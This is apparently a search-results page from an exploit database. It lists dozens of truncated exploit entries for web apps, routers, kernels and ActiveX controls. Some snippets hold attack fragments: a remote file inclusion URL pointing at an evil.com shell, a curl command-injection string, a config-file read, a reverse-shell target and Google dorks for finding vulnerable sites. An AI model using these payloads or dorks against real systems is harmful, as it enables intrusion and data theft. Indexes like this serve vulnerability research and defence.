41207 matches found
Google Android 2.0 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222TCP)
Google Android 2.0 2.1 - Code Execution Reverse Shell 10.0.2.2:2222TCP // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android : //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1...
Geeklog 2 - BaseView.php Remote File Inclusion
Geeklog 2 - BaseView.php Remote File Inclusion GeekLog = 2.× BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php...
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
DUware DUpaypal 3.03.1 - sub.asp?iSub SQL Injection
DUware DUpaypal 3.03.1 - sub.asp?iSub SQL Injection source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit coul...
DUware DUclassmate 1.x - default.asp?iState SQL Injection
DUware DUclassmate 1.x - default.asp?iState SQL Injection source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
Netlink GPON Router 1.0.11 - Remote Code Execution
Netlink GPON Router 1.0.11 - Remote Code Execution Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls...
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow ''' ======================================================== Unauthenticated Stack Overflow in Multiple Gpon Devices ======================================================== . contents:: Table Of Content Overview ========...
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
jQuery-File-Upload 9.22.0 - Arbitrary File Upload Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload Author: Larry W. Cashdollar, @larry0 Date: 2018-10-09 Vendor: https://github.com/blueimp Download Site: https://github.com/blueimp/jQuery-File-Upload/releases CVE-ID: N/A Vulnerability: The...
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow PoC Exploit Title: Delta Electronics Delta Industrial Automation COMMGR - Remote STACK-BASED BUFFER OVERFLOW Date: 02.07.2018 Exploit Author: t4rkd3vilz Vendor Homepage: http://www.deltaww.com/ Software Link:...
PHP PEAR 1.10.1 - Arbitrary File Download
PHP PEAR 1.10.1 - Arbitrary File Download + + Credits / Discovery: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt + ISR: ApparitionSEC + Vendor: ============ pear.php.net Product:...
WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery
WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery Advisory ID: HTB23206 Product: XCloner Wordpress plugin Vendor: XCloner Vulnerable Versions: 3.1.0 and probably prior Tested Version: 3.1.0 Advisory Publication: March 12, 2014 without technical details Vendor Notification: March 12, 201...
Linux Kernel 2.6.37 (RedHat Ubuntu 10.04) - Full-Nelson.c Local Privilege Escalation
Linux Kernel 2.6.37 RedHat Ubuntu 10.04 - Full-Nelson.c Local Privilege Escalation / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg @djrbliss on twitter Usage: gcc full-nelson.c -o full-nelson ./full-nelson This exploit leverages three vulnerabilities to get root, all of which...
Hampshire Trading Standards Script - SQL Injection
Hampshire Trading Standards Script - SQL Injection Title: Hampshire Trading Standards Script SQL Injection Vulnerability Version: 1.0 Author: Mr.P3rfekT Software Link:N/A Tested on Lunix CVE : N/A Founded By Mr.P3rfekT Dork : " inurl:tradeCategory.php?id= " Helllo Allz. Exploit :...
Chilkat Crypt - ActiveX Arbitrary File CreationExecution
Chilkat Crypt - ActiveX Arbitrary File CreationExecution ----------------------------------------------------------------------------- Chilkat Crypt Activex Component Arbitrary File Creation/Execution url: http://www.chilkatsoft.com File: ChilkatCrypt2.dll CLSID:...
TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution
TikiWiki 1.9.8 - tiki-graphformula.php Command Execution !/usr/bin/perl TikiWiki $Id: milw0rmtikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $ use strict; use LWP::UserAgent; my $target = shift || &usage; my $proxy = shift; my $command; &exploit$target, "cat db/local.php", $proxy; print "? php...
Apache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow
Apache 1.3.372.0.592.2.3 modrewrite - Remote Overflow !/bin/sh Exploit for Apache modrewrite off-by-one. Vulnerability discovered by Mark Dowd. CVE-2006-3747 by jack 2006-08-20 Thx to xuso for help me with the shellcode. I suppose that you've the "RewriteRule kung/. $1" rule if not you must...
SoX - .wav Local Buffer Overflow
SoX - .wav Local Buffer Overflow //--------------------------------- Begin Code: sox-exploiter.c --------------------------------- / Copyright Rosiello Security 2004 http://www.rosiello.org CVE Reference: CAN-2004-0557 Bug Type: Stack Overflow Date: 01/08/2004 Ulf Harnhammar reported that there a...
VMWare Fusion - Local Privilege Escalation
VMWare Fusion - Local Privilege Escalation Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusi...
OpenSMTPD 6.6.3 - Arbitrary File Read
OpenSMTPD 6.6.3 - Arbitrary File Read Title: OpenSMTPD 6.6.3 - Arbitrary File Read Date: 2020-02-20 Author: qualys Vendor: https://www.opensmtpd.org/ CVE: 2020-8793 / Local information disclosure in OpenSMTPD CVE-2020-8793 Copyright C 2020 Qualys, Inc. This program is free software: you can...
Centreon 19.10.5 - Remote Command Execution
Centreon 19.10.5 - Remote Command Execution Exploit Title: Centreon 19.10.5 - Remote Command Execution Date: 2020-01-27 Exploit Author: Fabien AUNAY, Omri BASO Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7 CVE :...
Listing Hub CMS 1.0 - pages.php id SQL Injection
Listing Hub CMS 1.0 - pages.php id SQL Injection Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection Google Dork: inurl:"pages.php?title=privacy-policy" Date: 14 Feb 2019 Exploit Author: Deyaa Muhammad Author EMail: contact at deyaa.me Author Blog: http://deyaa.me Vendor Homepage:...
MMonit 3.7.2 - Privilege Escalation
MMonit 3.7.2 - Privilege Escalation !/usr/env/python3 """ Vulnerability title: M/Monit = 3.7.2 - Privilege Escalation Author: Dolev Farhi Vulnerable version: 2.0.151021 Link: https://mmonit.com Date: 2/17/2019 """ import sys import requests MMONITURL = 'http://ip.add.re.ss:8080' MMONITUSER =...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor clie5attach Nullpointer Dereference OS-S Security Advisory 2016-09 Linux visor clie5attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2015-7566 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Paddelberg Topsite Script - Authentication Bypass
Paddelberg Topsite Script - Authentication Bypass Exploit Title: Paddelberg's topsite-script admin auth bypass. Google Dork: intext:"powered by php scripte webmaster resource" Date: 8. 1. 2012 Author: Christian Inci Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/...
DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion
DZCP deV!Lz Clanportal 1.5.4 - Local File Inclusion Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status:...
AOL 9.5 - ActiveX Heap Spray
AOL 9.5 - ActiveX Heap Spray AOL 9.5 ActiveX 0day Exploit heap spray + AOL 9.5 ActiveX 0day Exploit heap spray + Author : Dzattacker + Discovered by: Hellcode Research http://www.hellcode.net + Reference: http://www.exploit-db.com/exploits/11190 + Tested on Windows Xp SP3 ,IE7 // win32exec - calc...
BIND 9.x - Remote DNS Cache Poisoning
BIND 9.x - Remote DNS Cache Poisoning / Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack Compilation: $ gcc -o kaminsky-attack kaminsky-attack.c dnet-config --libs -lm Dependency: libdnet aka libdumbnet-dev under Ubuntu Author: marc.bevand at rapid7 dot com / define BSDSOURCE inclu...
TikiWiki Project 1.8 - tiki-index.php?comments_offset offset SQL Injections
TikiWiki Project 1.8 - tiki-index.php?commentsoffset offset SQL Injections source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such ...
Sudo 1.8.25p - pwfeedback Buffer Overflow (PoC)
Sudo 1.8.25p - pwfeedback Buffer Overflow PoC Title: Sudo 1.8.25p - Buffer Overflow Date: 2020-01-30 Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide...
Alcatel-Lucent Omnivista 8770 - Remote Code Execution
Alcatel-Lucent Omnivista 8770 - Remote Code Execution Exploit Title: Alcatel-Lucent Omnivista 8770 - Remote Code Execution Google Dork: inurl:php-bin/webclient.php Date: 2019-12-01 Author: 0x1911 Vendor Homepage: https://www.al-enterprise.com/ Software Link:...
FlexAir Access Control 2.4.9api3 - Remote Code Execution
FlexAir Access Control 2.4.9api3 - Remote Code Execution Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution Google Dork: NA Date: 2019-11-11 Exploit Author: LiquidWorm Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ Software Link:...
Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow
Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 aka eSpac...
McAfee ePO 5.9.1 - Registered Executable Local Access Bypass
McAfee ePO 5.9.1 - Registered Executable Local Access Bypass Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass Date: 2019-03-07 Exploit Author: @leonjza Vendor Homepage: https://www.mcafee.com/ Software Link:...
Dell Touchpad - ApMsgFwd.exe Denial of Service
Dell Touchpad - ApMsgFwd.exe Denial of Service / Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service Author: Souhail Hammou Vendor Homepage: https://www.alps.com/ Tested on : Alps Pointing-device Driver 10.1.101.207 CVE: CVE-2018-10828 / include include include / Details: ========== ApMsgFwd.ex...
OpenBSD - at Stack Clash Local Privilege Escalation
OpenBSD - at Stack Clash Local Privilege Escalation / OpenBSDat.c for CVE-2017-1000373 Copyright c 2017 Qualys, Inc. slowsort adapted from lib/libc/stdlib/qsort.c: Copyright c 1992, 1993 The Regents of the University of California. All rights reserved. Redistribution and use in source and binary...
Vanilla Forums 2.3 - Remote Code Execution
Vanilla Forums 2.3 - Remote Code Execution !/bin/bash Vanilla Forums = 2.3 Remote Code Execution RCE PoC Exploit 0day Core version no plugins, default config...
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation MS16-135 2 / Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary:...
Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass
Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass Date: 09.02.16 Exploit Author: Tal Solomon of Palantir Security Vendor Homepage:...
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details Vendor...
Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow
Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow Credit: Maksymilian Arciemowicz CXSECURITY Website: http://cxsecurity.com/ http://cert.cx/ Affected software: - MACOS's Commands such as: ls, find, rm -...
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection ============================================= - Release date: 29.10.2015 - Discovered by: Dawid Golunski - Severity: High/Critical - eBay Magento ref.: APPSEC-1045 ============================================= I. VULNERABILITY...
Joomla! Component JV Comment 3.0.2 - id SQL Injection
Joomla! Component JV Comment 3.0.2 - id SQL Injection Advisory ID: HTB23195 Product: JV Comment Joomla Extension Vendor: joomlavi.com Vulnerable Versions: 3.0.2 and probably prior Tested Version: 3.0.2 Advisory Publication: January 2, 2014 without technical details Vendor Notification: January 2,...
D-Link IP Cameras - Multiple Vulnerabilities
D-Link IP Cameras - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ D-Link IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: D-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0303 Advisory URL:...
sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation
sudo 1.8.0 1.8.3p1 - sudodebug glibc FORTIFYSOURCE Bypass + Privilege Escalation / death-star.c sudo v1.8.0-1.8.3p1 sudodebug format string root exploit + glibc FORTIFYSOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFYSOURCE format string...
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities Secure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote:...
Linux Kernel 2.6.202.6.242.6.27_7-10 (Ubuntu 7.048.048.10 Fedora Core 10 OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow
Linux Kernel 2.6.202.6.242.6.277-10 Ubuntu 7.048.048.10 Fedora Core 10 OpenSuse 11.1 - SCTP FWD Memory Corruption Remote Overflow / CVE-2009-0065 SCTP FWD Chunk Memory Corruption Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit coded by: sgrakkyu antifork.org...
Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp?id SQL Injection
Comersus Cart 7.0.7 - comersusoptReviewReadExec.asp?id SQL Injection source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or...
Microsoft Windows - GDI+ .ICO File Remote Denial of Service
Microsoft Windows - GDI+ .ICO File Remote Denial of Service Author : kad Mail : kadathighsecudotcom Site : http://www.highsecu.com highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files...
Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
Tautulli 2.1.9 - Cross-Site Request Forgery ShutDown Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery ShutDown Date: 2018-12-17 Exploit Author: Ismail Tasdelen Vendor Homepage: https://tautulli.com/ Software : https://github.com/Tautulli/Tautulli Product Version: v2.1.9 Platform: Window...
AppXSvc 17763 - Arbitrary File Overwrite (DoS)
AppXSvc 17763 - Arbitrary File Overwrite DoS Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite DoS Date: 2019-10-28 Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version: 17763.1.amd64fre.rs5release.180914-1434 Tested on: Windows 10 Version 1809 for x64-based...